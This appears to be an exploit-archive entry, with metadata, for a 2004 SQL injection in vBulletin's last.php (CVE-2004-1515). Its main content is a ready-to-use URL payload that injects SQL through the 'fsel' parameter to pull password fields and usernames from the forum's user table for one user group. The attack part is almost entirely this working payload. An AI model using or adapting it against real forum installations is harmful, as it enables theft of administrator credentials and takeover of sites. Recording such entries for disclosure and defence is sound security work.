vBulletin - 'LAST.php' SQL Injection

Author: anonymous
type: webapps
platform: php
port: 
date_added: 2004-11-14
date_updated: 
verified: 1
codes: OSVDB-11701;CVE-2004-1515
tags: 
aliases: 
screenshot_url: 
application_url: 

Example:

http://www.example.com/last.php?fsel=,user.password%20as%20title,user.%20%20%20%20username%20as%20lastposter%20FROM%20user,thread%20%20%20%20%20WHERE%20usergroupid=6%20LIMIT%201

# milw0rm.com [2004-11-15]
↑